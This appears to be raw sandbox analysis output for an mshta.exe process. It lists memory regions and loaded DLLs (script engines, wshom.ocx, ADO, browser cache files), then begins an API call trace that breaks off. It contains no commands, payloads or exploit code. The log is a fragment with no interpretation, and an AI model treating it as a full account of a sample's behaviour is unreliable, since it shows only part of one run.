name = "private_0x000000007efaa000"
filename = ""
Region:
id = 1043
start_va = 0x72e00000
end_va = 0x72e5efff
monitored = 0
entry_point = 0x72e02134
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll")
Region:
id = 1044
start_va = 0x4c0000
end_va = 0x4c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 1045
start_va = 0x5a0000
end_va = 0x5d8fff
monitored = 0
entry_point = 0x5a3089
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll")
Region:
id = 1046
start_va = 0x4c0000
end_va = 0x4c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 1047
start_va = 0x4c0000
end_va = 0x4c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 1048
start_va = 0x29b0000
end_va = 0x2aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 1049
start_va = 0x747d0000
end_va = 0x7524ffff
monitored = 0
entry_point = 0x747d6b95
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll")
Region:
id = 1050
start_va = 0x4c0000
end_va = 0x4c1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 1051
start_va = 0x2ab0000
end_va = 0x2bdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ieframe.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ieframe.dll.mui")
Region:
id = 1052
start_va = 0x663a0000
end_va = 0x66451fff
monitored = 1
entry_point = 0x663c8142
region_type = mapped_file
name = "jscript.dll"
filename = "\\Windows\\SysWOW64\\jscript.dll" (normalized: "c:\\windows\\syswow64\\jscript.dll")
Region:
id = 1054
start_va = 0x66330000
end_va = 0x6639afff
monitored = 1
entry_point = 0x66331409
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll")
Region:
id = 1057
start_va = 0x72cb0000
end_va = 0x72de2fff
monitored = 0
entry_point = 0x72cb145e
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll")
Region:
id = 1062
start_va = 0x2be0000
end_va = 0x2ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002be0000"
filename = ""
Region:
id = 1063
start_va = 0x22a0000
end_va = 0x233ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 1064
start_va = 0x2de0000
end_va = 0x300ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002de0000"
filename = ""
Region:
id = 1065
start_va = 0x2be0000
end_va = 0x2cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002be0000"
filename = ""
Region:
id = 1066
start_va = 0x2da0000
end_va = 0x2ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002da0000"
filename = ""
Region:
id = 1067
start_va = 0x2de0000
end_va = 0x2edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002de0000"
filename = ""
Region:
id = 1068
start_va = 0x2fd0000
end_va = 0x300ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fd0000"
filename = ""
Region:
id = 1069
start_va = 0x2cc0000
end_va = 0x2d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cc0000"
filename = ""
Region:
id = 1070
start_va = 0x3010000
end_va = 0x310ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003010000"
filename = ""
Region:
id = 1071
start_va = 0x2de0000
end_va = 0x2e9ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 1072
start_va = 0x2ea0000
end_va = 0x2edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ea0000"
filename = ""
Region:
id = 1073
start_va = 0x3110000
end_va = 0x350ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003110000"
filename = ""
Region:
id = 1074
start_va = 0x4d0000
end_va = 0x4d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll")
Region:
id = 1075
start_va = 0x5a0000
end_va = 0x5c7fff
monitored = 0
entry_point = 0x5a145e
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll")
Region:
id = 1076
start_va = 0x5d0000
end_va = 0x5d1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 1077
start_va = 0x745e0000
end_va = 0x745eafff
monitored = 0
entry_point = 0x745e1992
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1078
start_va = 0x5e0000
end_va = 0x5effff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 1079
start_va = 0x1e40000
end_va = 0x1e47fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 1080
start_va = 0x1e50000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 1081
start_va = 0x75610000
end_va = 0x75644fff
monitored = 0
entry_point = 0x7561145d
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 1082
start_va = 0x76c10000
end_va = 0x76c15fff
monitored = 0
entry_point = 0x76c11782
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 1083
start_va = 0x2ee0000
end_va = 0x2fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ee0000"
filename = ""
Region:
id = 1084
start_va = 0x74560000
end_va = 0x745a3fff
monitored = 0
entry_point = 0x745763f9
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 1085
start_va = 0x3510000
end_va = 0x373ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003510000"
filename = ""
Region:
id = 1086
start_va = 0x74540000
end_va = 0x7455bfff
monitored = 0
entry_point = 0x7454a431
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")
Region:
id = 1087
start_va = 0x74530000
end_va = 0x74536fff
monitored = 0
entry_point = 0x7453128d
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")
Region:
id = 1088
start_va = 0x745b0000
end_va = 0x745d0fff
monitored = 0
entry_point = 0x745b145e
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 1089
start_va = 0x772d0000
end_va = 0x77314fff
monitored = 0
entry_point = 0x772d11e1
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 1090
start_va = 0x1e60000
end_va = 0x1e67fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "urlmon.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui")
Region:
id = 1091
start_va = 0x74360000
end_va = 0x743b1fff
monitored = 0
entry_point = 0x743614be
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")
Region:
id = 1092
start_va = 0x74340000
end_va = 0x74354fff
monitored = 0
entry_point = 0x743412de
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")
Region:
id = 1093
start_va = 0x74330000
end_va = 0x7433cfff
monitored = 0
entry_point = 0x74331326
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")
Region:
id = 1094
start_va = 0x1e70000
end_va = 0x1e70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 1095
start_va = 0x1e70000
end_va = 0x1e70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e70000"
filename = ""
Region:
id = 1096
start_va = 0x2ee0000
end_va = 0x2f1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ee0000"
filename = ""
Region:
id = 1097
start_va = 0x2f80000
end_va = 0x2fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f80000"
filename = ""
Region:
id = 1098
start_va = 0x3740000
end_va = 0x383ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003740000"
filename = ""
Region:
id = 1099
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1100
start_va = 0x2500000
end_va = 0x253ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1101
start_va = 0x3840000
end_va = 0x393ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003840000"
filename = ""
Region:
id = 1102
start_va = 0x74320000
end_va = 0x74325fff
monitored = 0
entry_point = 0x7432125a
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll")
Region:
id = 1103
start_va = 0x7efa1000
end_va = 0x7efa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 1104
start_va = 0x74310000
end_va = 0x7431ffff
monitored = 0
entry_point = 0x743138c1
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll")
Region:
id = 1105
start_va = 0x3510000
end_va = 0x366ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003510000"
filename = ""
Region:
id = 1106
start_va = 0x3700000
end_va = 0x373ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003700000"
filename = ""
Region:
id = 1107
start_va = 0x22a0000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 1108
start_va = 0x2300000
end_va = 0x233ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1109
start_va = 0x2be0000
end_va = 0x2c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002be0000"
filename = ""
Region:
id = 1110
start_va = 0x2c80000
end_va = 0x2cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c80000"
filename = ""
Region:
id = 1111
start_va = 0x74400000
end_va = 0x74405fff
monitored = 0
entry_point = 0x744014b2
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")
Region:
id = 1112
start_va = 0x22a0000
end_va = 0x22bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 1113
start_va = 0x22f0000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022f0000"
filename = ""
Region:
id = 1114
start_va = 0x2340000
end_va = 0x237ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002340000"
filename = ""
Region:
id = 1115
start_va = 0x3a40000
end_va = 0x3b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a40000"
filename = ""
Region:
id = 1116
start_va = 0x744e0000
end_va = 0x7451bfff
monitored = 0
entry_point = 0x744e145d
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1117
start_va = 0x7ef9e000
end_va = 0x7efa0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 1118
start_va = 0x74450000
end_va = 0x74454fff
monitored = 0
entry_point = 0x744515df
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll")
Region:
id = 1119
start_va = 0x77230000
end_va = 0x77232fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll")
Region:
id = 1120
start_va = 0x74440000
end_va = 0x74445fff
monitored = 0
entry_point = 0x74441673
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll")
Region:
id = 1121
start_va = 0x743c0000
end_va = 0x743f7fff
monitored = 0
entry_point = 0x743c990e
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")
Region:
id = 1122
start_va = 0x3b40000
end_va = 0x3ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b40000"
filename = ""
Region:
id = 1123
start_va = 0x22c0000
end_va = 0x22d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 1124
start_va = 0x2ce0000
end_va = 0x2d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ce0000"
filename = ""
Region:
id = 1125
start_va = 0x2d50000
end_va = 0x2d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 1126
start_va = 0x3de0000
end_va = 0x3edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003de0000"
filename = ""
Region:
id = 1127
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Region:
id = 1128
start_va = 0x66230000
end_va = 0x66328fff
monitored = 0
entry_point = 0x66253abe
region_type = mapped_file
name = "msado15.dll"
filename = "\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll")
Region:
id = 1129
start_va = 0x664b0000
end_va = 0x664cefff
monitored = 0
entry_point = 0x664ba47a
region_type = mapped_file
name = "msdart.dll"
filename = "\\Windows\\SysWOW64\\msdart.dll" (normalized: "c:\\windows\\syswow64\\msdart.dll")
Region:
id = 1130
start_va = 0x2540000
end_va = 0x257ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002540000"
filename = ""
Region:
id = 1131
start_va = 0x66520000
end_va = 0x66540fff
monitored = 1
entry_point = 0x6652e356
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx")
Region:
id = 1132
start_va = 0x66500000
end_va = 0x66511fff
monitored = 0
entry_point = 0x66501200
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")
Region:
id = 1133
start_va = 0x664d0000
end_va = 0x664f9fff
monitored = 0
entry_point = 0x664d13f2
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll")
Region:
id = 1134
start_va = 0x23c0000
end_va = 0x23d4fff
monitored = 0
entry_point = 0x23c13f2
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll")
Region:
id = 1135
start_va = 0x1e80000
end_va = 0x1e8bfff
monitored = 1
entry_point = 0x1e8e356
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx")
Region:
id = 1136
start_va = 0x3020000
end_va = 0x305ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003020000"
filename = ""
Region:
id = 1137
start_va = 0x30d0000
end_va = 0x310ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000030d0000"
filename = ""
Region:
id = 1138
start_va = 0x3bb0000
end_va = 0x3caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003bb0000"
filename = ""
Region:
id = 1139
start_va = 0x3cb0000
end_va = 0x3ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003cb0000"
filename = ""
Region:
id = 1140
start_va = 0x73fa0000
end_va = 0x74094fff
monitored = 0
entry_point = 0x73fb0d9e
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 1141
start_va = 0x7ef98000
end_va = 0x7ef9afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef98000"
filename = ""
Region:
id = 1142
start_va = 0x22e0000
end_va = 0x22e1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000022e0000"
filename = ""
Region:
id = 1143
start_va = 0x741f0000
end_va = 0x7423bfff
monitored = 0
entry_point = 0x741f2c14
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 1144
start_va = 0x77030000
end_va = 0x771ccfff
monitored = 0
entry_point = 0x770317e7
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 1145
start_va = 0x77580000
end_va = 0x775a6fff
monitored = 0
entry_point = 0x775858b9
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1146
start_va = 0x76bf0000
end_va = 0x76c01fff
monitored = 0
entry_point = 0x76bf1441
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 1147
start_va = 0x24e0000
end_va = 0x24ecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui")
Region:
id = 1148
start_va = 0x24f0000
end_va = 0x24f3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 1149
start_va = 0x2690000
end_va = 0x26a6fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db")
Region:
id = 1150
start_va = 0x2580000
end_va = 0x2580fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002580000"
filename = ""
Region:
id = 1151
start_va = 0x24f0000
end_va = 0x24f3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1152
start_va = 0x26b0000
end_va = 0x26dffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db")
Region:
id = 1153
start_va = 0x26e0000
end_va = 0x26e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1154
start_va = 0x2be0000
end_va = 0x2c45fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1155
start_va = 0x27f0000
end_va = 0x27fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui")
Region:
id = 1219
start_va = 0x3510000
end_va = 0x35dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003510000"
filename = ""
Region:
id = 1220
start_va = 0x3660000
end_va = 0x366ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003660000"
filename = ""
Region:
id = 1221
start_va = 0x3ee0000
end_va = 0x480ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Thread:
id = 28
os_tid = 0xe84
[0077.892] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39fd8c | out: lpSystemTimeAsFileTime=0x39fd8c*(dwLowDateTime=0x898cf440, dwHighDateTime=0x1d7fe3c))
[0077.892] GetCurrentProcessId () returned 0xe80
[0077.892] GetCurrentThreadId () returned 0xe84
[0077.892] GetTickCount () returned 0x1444d83
[0077.892] QueryPerformanceCounter (in: lpPerformanceCount=0x39fd84 | out: lpPerformanceCount=0x39fd84*=2140214819557) returned 1
[0077.892] GetModuleHandleA (lpModuleName=0x0) returned 0x480000
[0077.892] GetStartupInfoA (in: lpStartupInfo=0x39fc98 | out: lpStartupInfo=0x39fc98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0xa, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0077.892] GetVersionExA (in: lpVersionInformation=0x39fce8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x39fce8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0077.892] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x30000
[0077.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000
[0077.893] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3
[0077.893] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252
[0077.893] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0
[0077.893] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f
[0077.893] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.893] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.894] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.894] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.894] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.894] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.894] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.894] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.894] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.894] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.894] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.894] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.894] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.895] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.895] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.895] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.895] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76fe0000
[0077.895] GetProcAddress (hModule=0x76fe0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76ff0ce4
[0077.895] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.895] GetProcAddress (hModule=0x76fe0000, lpProcName="EncodePointer") returned 0x77a20fcb
[0077.895] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.895] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.895] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.895] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.896] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.896] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.896] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
[0077.896] GetProcAddress (hModule=0x76fe0000, lpProcName="DecodePointer") returned 0x77a19d35
[0077.896] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76fe0000
